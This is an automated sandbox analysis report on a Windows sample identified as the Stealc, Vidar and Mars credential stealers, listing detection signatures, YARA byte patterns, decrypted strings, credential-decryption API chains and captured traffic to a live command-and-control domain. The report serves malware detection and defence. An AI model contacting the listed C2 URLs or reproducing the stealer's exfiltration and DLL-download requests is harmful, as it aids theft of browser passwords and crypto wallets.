Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pYJeC4VJbw.exe

Overview

General Information

Sample name:pYJeC4VJbw.exe
renamed because original name is a hash value
Original sample name:14c3db1bdba407c23f0e80bbfdd6db0f.exe
Analysis ID:1435882
MD5:14c3db1bdba407c23f0e80bbfdd6db0f
SHA1:304c2d438d926f73f58f1ee9635b449b585dddce
SHA256:596a9e9ed53dbeb50b69a93bfeef67855baf488f3638695b5485fd1c9633fad7
Tags:exe
Infos:

Detection

Mars Stealer, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • pYJeC4VJbw.exe (PID: 6936 cmdline: "C:\Users\user\Desktop\pYJeC4VJbw.exe" MD5: 14C3DB1BDBA407C23F0E80BBFDD6DB0F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
        00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000000.00000002.2884797147.0000000002D97000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x1168:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000000.00000002.2884177155.0000000002C00000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.pYJeC4VJbw.exe.2c80e67.2.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          0.2.pYJeC4VJbw.exe.2c80e67.2.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
            0.2.pYJeC4VJbw.exe.2c80e67.2.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              0.2.pYJeC4VJbw.exe.2c80e67.2.raw.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                0.2.pYJeC4VJbw.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  Click to see the 7 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: https://shaffatta.com/d32e011d2eaa85a0/mozglue.dllAvira URL Cloud: Label: malware
                  Source: https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dllAvira URL Cloud: Label: malware
                  Source: https://shaffatta.com/d32e011d2eaa85a0/nss3.dllAvira URL Cloud: Label: malware
                  Source: https://shaffatta.com/d32e011d2eaa85a0/freebl3.dllAvira URL Cloud: Label: malware
                  Source: https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dllAvira URL Cloud: Label: malware
                  Source: https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dllAvira URL Cloud: Label: malware
                  Source: https://shaffatta.com/d32e011d2eaa85a0/softokn3.dllAvira URL Cloud: Label: malware
                  Multi AV Scanner detection for domain / URL
                  Source: https://shaffatta.com/DVirustotal: Detection: 8%Perma Link
                  Source: https://shaffatta.com/fdca69ae739b4897.phpVirustotal: Detection: 11%Perma Link
                  Source: https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dllVirustotal: Detection: 11%Perma Link
                  Source: https://shaffatta.com/fdca69ae739b4897.php&Virustotal: Detection: 8%Perma Link
                  Source: https://shaffatta.com/5Virustotal: Detection: 10%Perma Link
                  Source: https://shaffatta.com/d32e011d2eaa85a0/freebl3.dllVirustotal: Detection: 6%Perma Link
                  Source: https://shaffatta.com/fdca69ae739b4897.phpaVirustotal: Detection: 8%Perma Link
                  Source: https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dlllVirustotal: Detection: 11%Perma Link
                  Source: https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dllVirustotal: Detection: 6%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: pYJeC4VJbw.exeReversingLabs: Detection: 65%
                  Source: pYJeC4VJbw.exeVirustotal: Detection: 46%Perma Link
                  Machine Learning detection for sample
                  Source: pYJeC4VJbw.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: CtIvEWInDoW
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: AgEBOxw
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: ijklmnopqrs
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: /#%33@@@
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: abcdefghijklmnopqrs
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: @@@@<@@@
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: abcdefghijklmnopqrs
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: "&&""..""&&"">>""&&"".."ikSQWQSQ_QBEklmn^pqrBtuvFxyzL123H5679+/|
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: %s\%V/yVs
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: %s\*.
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: }567y9n/S
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: ntTekeny
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: ging
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: PassMord0
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: J@@@`z`@J@@@J@@@
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: OPQRSTUVWXY
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: 456753+/---- '
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: '--- '
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: deh0Q
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: HeapFree
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: GetLocaleInfoA
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: ntProcessId
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: wininet.dll
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: shlwapi.dll
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: shell32.dll
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: .dll
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: column_text
                  Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpackString decryptor: login:
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00409540
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00406C10
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_004094A0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_004155A0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_004155A0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,0_2_0040BF90
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFA6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,0_2_6CFA6C80
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0FA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,0_2_6D0FA9A0

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeUnpacked PE file: 0.2.pYJeC4VJbw.exe.400000.0.unpack
                  Source: pYJeC4VJbw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 168.119.248.46:443 -> 192.168.2.4:49737 version: TLS 1.2
                  Source: Binary string: mozglue.pdbP source: pYJeC4VJbw.exe, 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                  Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                  Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                  Source: Binary string: nss3.pdb@ source: pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
                  Source: Binary string: nss3.pdb source: pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                  Source: Binary string: mozglue.pdb source: pYJeC4VJbw.exe, 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040D1C0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004015C0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00411650
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040B610
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040DB60
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040D540
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00412570
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_004121F0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00411B80
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECFIJDAAKEBGCGHIEHost: shaffatta.comContent-Length: 216Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKKHost: shaffatta.comContent-Length: 268Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFIHost: shaffatta.comContent-Length: 267Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJEGCBKKJECBGCGDBAHost: shaffatta.comContent-Length: 6691Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /d32e011d2eaa85a0/sqlite3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCAHost: shaffatta.comContent-Length: 4599Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFIHost: shaffatta.comContent-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIEHost: shaffatta.comContent-Length: 359Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJEHost: shaffatta.comContent-Length: 359Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /d32e011d2eaa85a0/freebl3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /d32e011d2eaa85a0/mozglue.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /d32e011d2eaa85a0/msvcp140.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /d32e011d2eaa85a0/nss3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /d32e011d2eaa85a0/softokn3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /d32e011d2eaa85a0/vcruntime140.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJDHost: shaffatta.comContent-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAKECAEGDHIECBGHIIIHost: shaffatta.comContent-Length: 267Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJDAKEGDBFHCAAKJJJDHost: shaffatta.comContent-Length: 265Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGHHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEHHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGHHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBGHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKEHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJEGCBGIDHCAKEBGIIDBHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKFBAKFBGDHIEBGDAKFHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJEHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKJJKFHIJKKFHJJECBAHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDBHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFHHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00404C70
                  Source: global trafficHTTP traffic detected: GET /d32e011d2eaa85a0/sqlite3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /d32e011d2eaa85a0/freebl3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /d32e011d2eaa85a0/mozglue.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /d32e011d2eaa85a0/msvcp140.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /d32e011d2eaa85a0/nss3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /d32e011d2eaa85a0/softokn3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /d32e011d2eaa85a0/vcruntime140.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: shaffatta.com
                  Source: unknownHTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECFIJDAAKEBGCGHIEHost: shaffatta.comContent-Length: 216Connection: Keep-AliveCache-Control: no-cache
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
